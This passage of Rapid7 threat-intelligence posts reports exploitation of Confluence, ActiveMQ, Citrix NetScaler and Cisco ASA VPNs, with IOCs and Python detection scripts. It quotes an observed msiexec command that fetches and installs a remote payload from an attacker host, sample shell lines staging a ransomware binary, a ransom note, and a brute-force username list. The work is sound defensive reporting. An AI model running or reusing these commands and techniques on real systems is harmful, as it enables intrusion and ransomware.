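        if reasons:
            hits.append(("process", child, reasons))
    for line in access_log_lines:
        reasons = score_access_log_line(line)
        if reasons:
            hits.append(("access_log", ACCESS_LOG.match(line)["path"], reasons))
    return hits


# Constructed sample telemetry: (parent command line, child command line).
JAVA = ("/opt/atlassian/confluence/jre/bin/java -Dcatalina.base=/opt/atlassian/confluence "
        "org.apache.catalina.startup.Bootstrap start")
SAMPLE_EVENTS = [
    (JAVA, "/usr/bin/bash -c whoami"),
    ('"C:\\Confluence\\Confluence\\bin\\tomcat9.exe" "//RS//Confluence"', "cmd /c whoami"),
    (JAVA, "/usr/bin/bash -c echo -n hxxp://192.0.2.10/agae > /tmp/lru"),
    ("/usr/bin/python3.6", "/bin/chmod +x ./qnetd"),
    (JAVA, "/opt/atlassian/confluence/jre/bin/java -version"),  # benign child
    ("/usr/lib/systemd/systemd", "/usr/bin/bash -c whoami"),    # not Confluence
]
SAMPLE_ACCESS_LOG = [
    "[05/Nov/2023:11:56:17 +0000] admin CONFLUENCE01 192.0.2.10 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 13ms 283 - Mozilla/5.0",
    "[05/Nov/2023:11:56:18 +0000] admin CONFLUENCE01 192.0.2.10 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 204 129ms - - Mozilla/5.0",
    "[05/Nov/2023:11:57:02 +0000] alice CONFLUENCE01 198.51.100.7 GET /rest/api/content/12345 HTTP/1.1 200 20ms 1024 - Mozilla/5.0",
]

if __name__ == "__main__":
    for source, item, reasons in triage(SAMPLE_EVENTS, SAMPLE_ACCESS_LOG):
        print(f"{source:10} {', '.join(reasons):50} {item}")
```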

Mitigation guidance

All versions of Confluence Server and Confluence Data Center are vulnerable to CVE-2023-22518. The vulnerability has been remediated in the following fixed versions:

  • 7.19.16
  • 8.3.4
  • 8.4.4
  • 8.5.3
  • 8.6.1

Atlassian Cloud users are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

Customers should update to a fixed version of Confluence on an emergency basis, restricting external access to the application at least until they are able to remediate. If you are unable to restrict access to the application or update on an emergency basis, Atlassian’s advisory includes interim measures you can take to mitigate risk from known attack vectors. As always, Rapid7 strongly recommends applying vendor-supplied patches rather than relying solely on temporary mitigations.

Indicators of compromise

IP addresses:

  • 193.176.179[.]41
  • 193.43.72[.]11
  • 45.145.6[.]112

Domains:
j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion

File hashes:

  • Bat file: /tmp/agttydcb.bat – MD5: 81b760d4057c7c704f18c3f6b3e6b2c4

  • ELF ransomware binary: /tmp/qnetd – SHA256: 4ed46b98d047f5ed26553c6f4fded7209933ca9632b998d265870e3557a5cdfe

Ransom note: read-me3.txt

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2023-22518 with an unauthenticated check available as of the November 1, 2023 content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. The following detection rules are deployed and alerting on activity related to Atlassian Confluence exploitation:

  • Suspicious Process – Confluence Java App Launching Processes
  • Webshell – Commands Launched by Webserver

Suspected Exploitation of Apache ActiveMQ CVE-2023-46604

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/

Tom Elkins, John Fenninger, Evan McCann, Matthew Smith, and Micah Young contributed attacker behavior insights to this blog.

Beginning Friday, October 27, Rapid7 Managed Detection and Response (MDR) identified suspected exploitation of Apache ActiveMQ CVE-2023-46604 in two different customer environments. In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations. Based on the ransom note and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October. Rapid7 observed similar indicators of compromise across the affected customer environments, both of which were running outdated versions of Apache ActiveMQ.

CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.” This is one of the more convoluted vulnerability descriptions we’ve seen, but the root cause of the issue is insecure deserialization.

Apache disclosed the vulnerability and released new versions of ActiveMQ on October 25, 2023. Proof-of-concept exploit code and vulnerability details are both publicly available. Rapid7’s vulnerability research team has tested the public PoC and confirmed that the behavior MDR observed in customer environments is similar to what we would expect from exploitation of CVE-2023-46604. Rapid7 research has a technical analysis of the vulnerability in AttackerKB.

Affected Products

According to Apache’s advisory, CVE-2023-46604 affects the following:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Observed Attacker Behavior

In a successful exploitation of the vulnerability, the java.exe process path points at the specific ActiveMQ installation being targeted; in this case, D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64, which was observed as the parent process in both incidents. Post-exploitation, the adversary attempted to load remote binaries named M2.png and M4.png using MSIExec. The threat actor’s attempts at ransomware deployment were somewhat clumsy: in one of the incidents Rapid7 observed, there were more than half a dozen unsuccessful attempts to encrypt assets.

HelloKitty Ransomware Details

Rapid7 acquired the MSI files M4.png and M2.png from 172.245.16[.]125 and analyzed them in a controlled environment. After analysis, Rapid7 observed that both MSI files contained a 32-bit .NET executable internally named dllloader. Within the .NET executable dllloader, Rapid7 found that the executable loads a Base64-encoded payload. We decoded the Base64-encoded payload and determined that it was a 32-bit .NET DLL named EncDLL.

The EncDLL binary contained functionality similar to that of ransomware: the DLL searches for specific processes and stops them from running. Rapid7 observed that the DLL encrypts files with specific extensions using the .NET RSACryptoServiceProvider class, appending the extension .locked to encrypted files. We also observed another function that provided information about which directories to avoid encrypting, a static variable assigned the ransomware note, and a function that attempted communication with an HTTP server at 172.245.16[.]125.

The ransomware note indicated communications should occur through the email address service@hellokittycat[.]online:

send 0.1btc to my address:bc1ql8an5slxutu3yjyu9rvhsfcpv29tsfhv3j9lr4. contact email:service@hellokittycat[.]online,if you can't contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me.

Indicators of Compromise

Rapid7’s vulnerability research team analyzed CVE-2023-46604 and available public exploit code. In our test setup, activemq.log had a single line entry for successful exploitation of CVE-2023-46604:

2023-10-31 05:04:58,736 | WARN  | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616

In the above example, the attacker’s IP was 192.168.86.35, and the target TCP port was 61616. More or less information may be available depending on the logging settings, which can be modified.

Other IOCs:

Files dropped and executed via the msiexec command:

  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"

The following file hashes were part of the two MSI packages downloaded from 172.245.16[.]125:

  • M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
  • M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
  • dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
  • EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C
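The two artifacts above, the single activemq.log WARN line left by exploitation and the msiexec command that pulled the MSI packages over HTTP, can both be checked mechanically. The following is an added example (not Rapid7 or Apache code): it parses the transport-failure line into its remote address, remote port and broker port, flags it when the source is outside a trusted client network, and scores a Windows command line for msiexec installing a package from an HTTP URL. The log line is the one quoted from Rapid7's test setup; the trusted network and the command lines are constructed.

```python
"""Added example (not Rapid7 or Apache code) for the CVE-2023-46604 artifacts
discussed above: the activemq.log transport-failure line and the
msiexec-over-HTTP staging command. Trusted network and command lines are
constructed; the log line is the one quoted in the post."""
from __future__ import annotations

import re
from ipaddress import ip_address, ip_network

# "<ts> | WARN | Transport Connection to: tcp://IP:PORT failed: <exception>
#  | <logger> | ActiveMQ Transport: tcp:///IP:PORT@BROKERPORT"
TRANSPORT_FAILURE = re.compile(
    r"^(?P<ts>\S+ \S+) \| WARN\s+\| Transport Connection to: "
    r"tcp://(?P<ip>[^:/]+):(?P<port>\d+) failed: (?P<exc>[^|]+?)\s*\| .*?\| "
    r"ActiveMQ Transport: tcp:///(?P=ip):(?P=port)@(?P<broker_port>\d+)\s*$"
)


def parse_transport_failure(line: str) -> dict | None:
    """Split the WARN line into its parts, or None if it is another message."""
    m = TRANSPORT_FAILURE.match(line)
    if not m:
        return None
    return {
        "timestamp": m["ts"],
        "remote_ip": m["ip"],
        "remote_port": int(m["port"]),
        "broker_port": int(m["broker_port"]),
        "exception": m["exc"].split(":")[0].strip(),  # exception class only
    }


def assess_transport_failure(line: str, trusted_networks) -> list[str]:
    """Reasons the aborted OpenWire connection deserves a look. The post
    notes that successful exploitation left only this line, so an aborted
    transport from an address that should never speak OpenWire is the lead."""
    ev = parse_transport_failure(line)
    if ev is None:
        return []
    reasons = []
    src = ip_address(ev["remote_ip"])
    if not any(src in ip_network(n) for n in trusted_networks):
        reasons.append("openwire_connection_from_untrusted_source")
    if ev["exception"] == "java.net.SocketException":
        reasons.append("transport_aborted_by_peer")
    return reasons


# msiexec install (/i), admin install (/a) or /package of an HTTP-hosted
# package; the observed commands were "start msiexec /q /i hxxp://.../m4.png".
MSIEXEC_REMOTE = re.compile(
    r"\bmsiexec(?:\.exe)?\b.*?/(?:i|a|package)\s+\"?(?P<url>https?://[^\s\"]+)",
    re.IGNORECASE,
)


def score_msiexec_cmdline(cmdline: str) -> list[str]:
    """Reasons a command line matches the MSIExec-over-HTTP staging pattern."""
    m = MSIEXEC_REMOTE.search(cmdline)
    if not m:
        return []
    reasons = ["msiexec_package_over_http"]
    if re.search(r"\s/q[nbrf]?\b", cmdline, re.IGNORECASE):
        reasons.append("quiet_install")
    # A package served under an image extension (m4.png) is masquerading.
    if not m["url"].lower().endswith(".msi"):
        reasons.append("package_extension_mismatch")
    return reasons


SAMPLE_LOG_LINE = ("2023-10-31 05:04:58,736 | WARN  | Transport Connection to: "
                   "tcp://192.168.86.35:15871 failed: java.net.SocketException: An established "
                   "connection was aborted by the software in your host machine | "
                   "org.apache.activemq.broker.TransportConnection.Transport | "
                   "ActiveMQ Transport: tcp:///192.168.86.35:15871@61616")
TRUSTED_OPENWIRE_CLIENTS = ["10.0.0.0/8"]  # constructed: where producers/consumers live
SAMPLE_CMDLINES = [
    'cmd.exe /c "start msiexec /q /i http://192.0.2.25/m4.png"',  # constructed, mirrors the post
    "msiexec /i C:\\installers\\app.msi /qn",                     # local package, benign
]

if __name__ == "__main__":
    print(parse_transport_failure(SAMPLE_LOG_LINE))
    print(assess_transport_failure(SAMPLE_LOG_LINE, TRUSTED_OPENWIRE_CLIENTS))
    for cmd in SAMPLE_CMDLINES:
        print(score_msiexec_cmdline(cmd), cmd)
```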

Mitigation Guidance

Organizations should update to a fixed version of ActiveMQ as soon as possible and look for indicators of compromise in their environments. Apache-supplied updates are available here. Apache also has information on improving the security of ActiveMQ implementations here.

Rapid7 Customers

Rapid7 MDR, InsightIDR, and Managed Threat Complete (MTC) customers have the following rules deployed and alerting on the post-exploitation activity related to this threat. Rapid7 recommends ensuring the Insight Agent is deployed to all applicable assets within our customers’ environments:

  • Suspicious Process – Apache ActiveMQ Launching CMD Process
  • Attacker Technique – MSIExec loading object via HTTP
  • Suspicious Process – Volume Shadow Service Delete Shadow Copies

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2023-46604 with an authenticated vulnerability check for Windows being targeted for today’s (Wednesday, November 1) content release.

CVE-2023-4966: Exploitation of Citrix NetScaler Information Disclosure Vulnerability

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/

On October 10, 2023, Citrix published an advisory on two vulnerabilities affecting NetScaler ADC and NetScaler Gateway. The more critical of these two issues is CVE-2023-4966, a sensitive information disclosure vulnerability that allows an attacker to read large amounts of memory after the end of a buffer. Notably, that memory includes session tokens, which permits an attacker to impersonate another authenticated user. On October 17, Citrix updated the advisory to indicate that they have observed exploitation in the wild. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added CVE-2023-4966 to their Known Exploited Vulnerabilities (KEV) catalog.

On October 25, 2023, security firm Assetnote released an analysis, including a proof of concept, that demonstrates how to steal session tokens. Since then, Shadowserver has noted an uptick in scanning for that endpoint. Rapid7 MDR is investigating potential exploitation of this vulnerability in a customer environment but is not yet able to confirm with high confidence that CVE-2023-4966 was the initial access vector.

Rapid7 recommends taking emergency action to mitigate CVE-2023-4966. Threat actors, including ransomware groups, have historically shown strong interest in Citrix NetScaler ADC vulnerabilities. We expect exploitation to increase. Our research team has a technical assessment of the vulnerability and its impact in AttackerKB.

Affected Products

Citrix published a blog on October 23 that has exploitation and mitigation details. Their advisory indicates that CVE-2023-4966 affects the following supported versions of NetScaler ADC and NetScaler Gateway:

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC 13.1-FIPS before 13.1-37.164
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

Note: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and is vulnerable.

In order to be exploitable, the appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server (which is a very common configuration). Citrix has indicated that customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.

Mitigation Guidance

Citrix NetScaler ADC and Gateway users should update to a fixed version immediately, without waiting for a typical patch cycle to occur. Additionally, Citrix’s blog on CVE-2023-4966 recommends killing all active and persistent sessions using the following commands:

kill icaconnection -all
kill rdp connection -all
kill pcoipConnection -all
kill aaa session -all
clear lb persistentSessions

For more information, see Citrix’s advisory.

Rapid7 Customers

InsightVM and Nexpose customers can assess their exposure to both of the CVEs in Citrix’s advisory (CVE-2023-4966, CVE-2023-4967) with authenticated vulnerability checks available in the October 23 content release.

Proactively Prevent Breaches with Expanded Endpoint Protection in Rapid7 MDR

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/10/02/proactively-prevent-breaches-with-expanded-endpoint-protection-in-rapid7-mdr/

Working with thousands of security and risk professionals across the globe, we know that complexity is the top challenge SOCs are facing today. As the attack surface rapidly expands, security teams need more effective ways to keep pace with digital transformation and get out of the cycle of constant reactive fire drills.

So, we have expanded endpoint protection within our leading MDR service, Managed Threat Complete, to include native next-generation antivirus (NGAV) and DFIR powered by our universal Insight Agent.

Building on the powerful vulnerability scanning, high efficacy threat detections, and rapid containment we deliver on the endpoint today, these new capabilities help unlock critical efficiency and consolidation teams need to gain control over their dynamic attack surface.

We’re also excited to integrate Velociraptor directly into InsightIDR. The integration empowers security teams to easily collect, query, and monitor virtually any aspect of their endpoint fleets with leading digital forensics and incident response (DFIR) technology and playbooks. Already a key tool used by our Incident Response consultants in every single Incident Response engagement, customers can now experience the power and insight Velociraptor brings on the endpoint, directly in the product.

Plus, Velociraptor now uses an expressive query language (rather than code), which makes it faster and easier to share custom detections with the open source community. This helps SOC teams root out new threats more quickly, while demonstrating our continued support to open source.

Rapid7 MDR: Full coverage, single trusted partner

A Gartner study found that 75% of organizations pursued security vendor consolidation in 2022, up from 29% in 2020. And we understand why. Rapid environment expansion and constantly escalating threats, combined with a growing skills gap, have left security professionals on their heels and over-indexed on reactive measures alone. Adoption of point solutions to keep up with change has resulted in more noise, inefficiency, and burnout. Previous SecOps approaches are broken; there has to be change.

Rapid7 tackles complexity head-on with a more proactive approach to security operations. By unifying relevant exposure management, external threat intelligence, and now prevention capabilities we are able to get ahead of risk and eliminate breaches earlier. This also reduces the noise and alerts downstream, enabling high efficacy threat detection, and accelerated response. With Rapid7, customers can feel confident they are covered from endpoint to the cloud, across both known and unknown threats.

While the attack surface grows, endpoints remain a critical foot in the door and target for attackers. Rapid7 delivers full threat lifecycle coverage on the endpoint via our lightweight agent, including:

  • Anticipate threats to prevent breaches earlier with leading vulnerability management and Next-Gen Antivirus.
  • Rich telemetry, unique intelligence, and curated content drives high efficacy detections.
  • Full kill chain visibility and streamlined automation contain threats faster than ever.
  • Robust forensic insights for expedited investigations and advanced hunting powered by Velociraptor.

Looking Ahead: Proactive Ransomware Prevention

As Rapid7 continues to invest in the most complete endpoint solutions, it will be addressing one of the most pervasive threats organizations face today: ransomware. Leveraging a patented approach from the integrated Minerva technology, these future capabilities will be able to recognize the earliest signals and behaviors to identify and intercept headline-making attacks before they are able to execute.

Rapid7’s incident response team is currently using this technology in the field, and soon these powerful capabilities will be available to Rapid7 MDR customers. You can learn more about how Rapid7 protects endpoints here.

Introducing Active Risk

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/09/25/introducing-active-risk/

Cyber risk is increasing in both volume and velocity. Given the landscape of threats, weaknesses, vulnerabilities, and misconfigurations, organizations, teams, and vulnerability analysts alike need better prioritization mechanisms. That’s why we developed a new risk scoring methodology: Active Risk.

Rapid7 has offered five risk strategies for many years, each strategy with its own specific approach to surfacing that which matters most. Our sixth risk strategy, Active Risk, is designed to focus security and remediation efforts on the vulnerabilities that are actively exploited in the wild or most likely to be exploited.

Active Risk uses CVSS scores along with intelligence from threat feeds like AttackerKB, Metasploit, ExploitDB, Project Heisenberg, the CISA KEV list, and other third-party dark web sources to provide security teams with threat-aware vulnerability risk scores on a scale of 0 to 1000.

Active Risk is available via InsightVM, InsightCloudSec, Nexpose, and our recently released Executive Risk View.

Enter Active Risk

Exploitability has become one of those terms that the security community has maligned, not out of spite, but simply because it’s been applied to too many use cases. Exploitability refers to the ease with which a vulnerability in a computer system, software application, or network can be exploited. But, even that definition can be misleading. Semantics aside, exploitability is really a question of likelihood.

This new risk strategy is focused on delivering unambiguous, near-real-time intelligence by systematically including a number of threat intelligence sources to enhance vulnerability risk scores.

There are a number of vulnerability intelligence sources that fuel prioritization in Active Risk, including:

  1. AttackerKB: Launched in 2020, a forum for the security community at large to share insights and views that help cut through all the hype and chaos, with a primary purpose to inform infosec professionals on vulnerabilities and security threats
  2. Project Heisenberg: A network of low-interaction honeypots with a singular purpose: to understand what attackers, researchers, and organizations are doing in, across, and against cloud environments. Established by Rapid7 in 2014, this global network records telemetry about connections and incoming attacks to better understand the tactics, techniques, and procedures used by bots and human attackers
  3. Metasploit: Arguably the most widely used, community supported, ethical hacking framework on the planet, used by whitehats, security researchers and generalists in pentesting, <pick-your-color> teaming, CTF drills, education as well as broad or very specialized security assessment exercises
  4. Exploit Database (exploit-db.com): Widely used online repository and reference for security researchers, pentesters, and ethical hackers; it’s become a go-to resource offering an extensive archive of exploits and vulnerabilities, allowing users to track the evolution of security threats over time across software, hardware, and operating systems
  5. CISA Known Exploited Vulnerabilities (KEV) Catalog: Established in 2021 by the Cybersecurity & Infrastructure Security Agency to “provide an authoritative source of vulnerabilities that have been exploited ‘in the wild’”; it has seen fairly broad and hasty adoption across industries as a method to focus and improve remediation throughput
  6. OSINT and Commercial Feeds: Depending on the nature of the vulnerability or threat, the sources above are combined and validated with additional intelligence and context to enhance prioritization results and ultimately customer outcomes

The immediate value that Active Risk delivers through threat intel data ingestion and normalization alone will drive interest in adoption. Active Risk is also CVSS 3.1 compliant across all new CVEs and is prepared for future adoption of revised scoring systems (CVSS v4.0 is targeting an October 31, 2023 publication). There is strong market demand for, and intensifying use of, ‘exploitability’ intelligence, as seen in CVSS v4.0 and in CISA KEV as previously mentioned.

Normalize vulnerability risk scoring across cloud and on-prem environments

Active Risk normalizes risk scores across cloud and on-premises environments to effectively assess and collaborate with teams across an organization.

Security teams can leverage Active Risk dashboard cards in InsightVM and Executive Risk View in our Cloud Risk Complete solution to support cross-functional conversations.

Active Risk is a step change along the path of risk prioritization improvement, and the much longer and windier road we travel together towards improved risk management outcomes.

A Look at Our Development Process of the Cloud Resource Enrichment API

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/09/07/a-look-at-our-development-process-of-the-cloud-resource-enrichment-api/

In today’s ever-evolving cybersecurity landscape, detecting and responding to cyber threats is paramount for organizations in cloud environments. At the same time, investigating cyber threat alerts can be arduous due to the time-consuming and complex process of data collection. To tackle this pain point, Rapid7 developed a new Cloud Resource Enrichment API that streamlines data retrieval from various cloud resources. The API empowers security analysts to swiftly respond to cyber threats and improve incident response time.

Identifying the Need for a Unified API

Protecting cloud resources from cyber attacks is a growing challenge. Security analysts must grapple with gathering relevant data spread across multiple systems and APIs, leading to incident response inefficiencies. Presented with this challenge, we recognized a pressing need for a unified API that collects all relevant data types related to a cloud resource during a cyber threat action. This API streamlines data access, enabling analysts to piece together a comprehensive view of incidents rapidly, enhancing cybersecurity operations.

Defining the Vision and Scope

Our development team worked closely with security analysts to tailor the API’s functionalities to meet real-world needs. Defining the API’s scope involved meticulous prioritization of features, striking the right balance between usability and data abundance. By involving analysts from the outset, we laid a solid foundation for the API’s success.

The Development Journey

Adopting agile methodologies, our team iteratively developed the API, adapting and fine-tuning as we progressed. The iterative development process played a vital role in ensuring the API’s success. By breaking down the project into smaller, manageable tasks, we could focus on specific features, implement them efficiently, and gather feedback from early prototypes. With a comprehensive design phase, we defined the API’s architecture and capabilities based on insights from security analysts. Regular meetings and feedback gathering facilitated continuous improvements, streamlining the data retrieval process.

The API utilizes RESTful API design principles for data integration and communication between cloud systems. It collects the following types of data:

  • Harvested cloud resource properties (image, IP, network interfaces, region, cloud organization and account, security groups, and much, much more)
  • Permissions data (permissions on the resource, permissions of the resource)
  • Security insights (risks, misconfigurations, vulnerabilities)
  • Security alerts (“threat finding”)
  • First level cloud related resources
  • Application context (tagging made by the client in the cloud environment)

Each data type required collaboration with a different team responsible for collecting and processing that data, so the feature involved developers from 6 different teams! Regular meetings and continuous communication with the development team and the product manager allowed us to incorporate suggestions and make iterative improvements to the API’s design and functionality.

Conclusion

The development journey of our Cloud Resource Enrichment API has been both challenging and rewarding. With a user-centric approach, we have crafted a powerful tool that empowers security teams to respond effectively to cyber threats. As we continue to enhance the API, we remain committed to fortifying organizations’ cyber defenses and elevating incident response capabilities. Together, we can better equip security analysts to face the ever-changing cyber war with confidence.

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/

Tyler Starks, Christiaan Beek, Robert Knapp, Zach Dayton, and Caitlin Condon contributed to this blog.

Rapid7’s managed detection and response (MDR) teams have observed increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual) dating back to at least March 2023. In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity we’ve observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups). Several incidents our managed services teams have responded to ended in ransomware deployment by the Akira and LockBit groups.

There is no clear pattern among target organizations or verticals. Victim organizations varied in size and spanned healthcare, professional services, manufacturing, and oil and gas, along with other verticals. We have included indicators of compromise (IOCs) and attacker behavior observations in this blog, along with practical recommendations to help organizations strengthen their security posture against future attacks. Note: Rapid7 has not observed any bypasses or evasion of correctly configured MFA.

Rapid7 has been actively working with Cisco over the course of our investigations. On August 24, Cisco’s Product Security Incident Response Team (PSIRT) published a blog outlining attack tactics they have observed, many of which overlap with Rapid7’s observations. We thank Cisco for their collaboration and willingness to share information in service of protecting users.

Observed attacker behavior

Rapid7 identified at least 11 customers who experienced Cisco ASA-related intrusions between March 30 and August 24, 2023. Our team traced the malicious activity back to an ASA appliance servicing SSL VPNs for remote users. ASA appliance patches varied across compromised appliances — Rapid7 did not identify any particular version that was unusually susceptible to exploitation.

In our analysis of these intrusions, Rapid7 identified multiple areas of overlap among observed IOCs. The Windows clientname WIN-R84DEUE96RB was often associated with threat actor infrastructure, along with the IP addresses 176.124.201[.]200 and 162.35.92[.]242. We also saw overlap in accounts used to authenticate into internal systems, including the use of accounts TEST, CISCO, SCANUSER, and PRINTER. User domain accounts were also used to successfully authenticate to internal assets — in several cases, attackers successfully authenticated on the first try, which may indicate that the victim accounts were using weak or default credentials.

The below image is an anonymized log entry where an attacker attempts a (failed) login to the Cisco ASA SSL VPN service. In our analysis of log files across different incident response cases, we frequently observed failed login attempts occurring within milliseconds of one another, which points at automated attacks.

In most of the incidents we investigated, threat actors attempted to log into ASA appliances with a common set of usernames, including:

  • admin
  • adminadmin
  • backupadmin
  • kali
  • cisco
  • guest
  • accounting
  • developer
  • ftp user
  • training
  • test
  • printer
  • echo
  • security
  • inspector
  • test test
  • snmp

The above is a fairly standard list of accounts that may point at use of a brute forcing tool. In some cases, the usernames in login attempts belonged to actual domain users. While we have no specific evidence of leaked victim credentials, we are aware that it’s possible to attempt to brute force a Cisco ASA service with the path +CSCOE+/logon.htm. VPN group names are also visible in the source code of the VPN endpoint login page and can be easily extracted, which can aid brute forcing attacks.
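The two signals described above, rejected logins from one source arriving milliseconds apart and a sweep through a generic username list, can be checked against ASA AAA syslog. The following is an added example (not Rapid7 or Cisco code): it parses %ASA-6-113005 rejection messages, then per source address flags a burst of failures inside a short window and a set of generic usernames drawn from the list above. The 113005 message body follows Cisco's documented "key = value" layout; the ISO-8601 timestamp with milliseconds is assumed to be prepended by the log collector, and every sample line is constructed.

```python
"""Added example (not Rapid7 or Cisco code): brute-force signals in ASA AAA
syslog. Timestamp format is an assumption about the collector; sample lines
are constructed."""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# "<ts> <host> %ASA-6-113005: AAA user authentication Rejected : reason = ...
#  : server = ... : user = ... : user IP = ..."
ASA_REJECT = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) %ASA-\d-113005: AAA user authentication Rejected(?P<fields>.*)$"
)

# Usernames seen across the ASA intrusions described in the post.
GENERIC_USERNAMES = {
    "admin", "adminadmin", "backupadmin", "kali", "cisco", "guest", "accounting",
    "developer", "ftp user", "training", "test", "printer", "echo", "security",
    "inspector", "test test", "snmp",
}


def parse_asa_rejection(line: str) -> dict | None:
    """Parse one 113005 line into its fields, or None for any other message."""
    m = ASA_REJECT.match(line)
    if not m:
        return None
    fields = {}
    for part in m["fields"].split(" : "):
        key, sep, value = part.partition(" = ")
        if sep:
            fields[key.strip()] = value.strip()
    if "user" not in fields or "user IP" not in fields:
        return None
    return {
        "timestamp": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ"),
        "user": fields["user"],
        "src_ip": fields["user IP"],
        "reason": fields.get("reason", ""),
    }


def detect_bruteforce(lines, window_ms=500, min_attempts=3, min_generic=3):
    """Per source IP: flag min_attempts rejections inside window_ms (the
    millisecond spacing noted in the post) and a sweep of generic usernames."""
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_asa_rejection(line)
        if ev:
            by_src[ev["src_ip"]].append((ev["timestamp"], ev["user"]))
    window = timedelta(milliseconds=window_ms)
    findings = {}
    for src, attempts in by_src.items():
        attempts.sort()
        reasons = []
        if any(attempts[i + min_attempts - 1][0] - attempts[i][0] <= window
               for i in range(len(attempts) - min_attempts + 1)):
            reasons.append("rapid_failed_logins")
        generic = sorted({u.lower() for _, u in attempts} & GENERIC_USERNAMES)
        if len(generic) >= min_generic:
            reasons.append("generic_username_sweep")
        if reasons:
            findings[src] = {"reasons": reasons, "attempts": len(attempts),
                             "generic_usernames": generic}
    return findings


# Constructed sample log: one automated sweep from 203.0.113.7, one ordinary
# typo from a real user, and one unrelated (successful) 113004 message.
SAMPLE_LINES = [
    "2023-08-21T14:02:17.101Z asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.0.0.5 : user = admin : user IP = 203.0.113.7",
    "2023-08-21T14:02:17.133Z asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.0.0.5 : user = cisco : user IP = 203.0.113.7",
    "2023-08-21T14:02:17.164Z asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.0.0.5 : user = test : user IP = 203.0.113.7",
    "2023-08-21T14:02:17.197Z asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.0.0.5 : user = guest : user IP = 203.0.113.7",
    "2023-08-21T14:05:41.820Z asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Invalid password : server = 10.0.0.5 : user = alice : user IP = 198.51.100.20",
    "2023-08-21T14:05:52.004Z asa01 %ASA-6-113004: AAA user authentication Successful : server = 10.0.0.5 : user = alice",
]

if __name__ == "__main__":
    for src, finding in detect_bruteforce(SAMPLE_LINES).items():
        print(src, finding)
```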

Upon successful authentication to internal assets, threat actors deployed set.bat. Execution of set.bat resulted in the installation and execution of the remote desktop application AnyDesk, with a set password of greenday#@!. In some cases, nd.exe was executed on systems to dump NTDS.DIT, as well as the SAM and SYSTEM hives, which may have given the adversary access to additional domain user credentials. The threat actors performed further lateral movement and binary executions across other systems within target environments to increase the scope of compromise. As mentioned previously, several of the intrusions culminated in the deployment and execution of Akira or LockBit-related ransomware binaries.

Dark web activity

